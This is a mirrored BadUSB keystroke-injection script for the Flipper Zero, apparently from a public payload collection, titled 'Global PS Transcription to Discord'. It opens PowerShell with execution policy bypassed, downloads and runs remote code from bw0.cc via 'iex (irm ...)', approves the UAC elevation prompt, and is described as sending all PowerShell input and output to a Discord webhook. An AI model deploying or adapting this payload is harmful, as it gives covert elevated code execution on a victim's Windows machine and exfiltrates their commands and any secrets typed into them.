mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-12 15:50:08 -08:00
16 lines
458 B
Plaintext
16 lines
458 B
Plaintext
REM Title: Global PS Trascription to Discord
|
|
REM Author: @beigeworm | https://github.com/beigeworm
|
|
REM Description: Log all powershell input and output to a discord webhook
|
|
REM Target: Windows 10, 11
|
|
|
|
REM some setup for dukie script.
|
|
DEFAULT_DELAY 100
|
|
|
|
REM open powershell (remove -W Hidden to show the window).
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/gbps)
|
|
CTRL-SHIFT ENTER
|
|
DELAY 2500
|
|
ALT y
|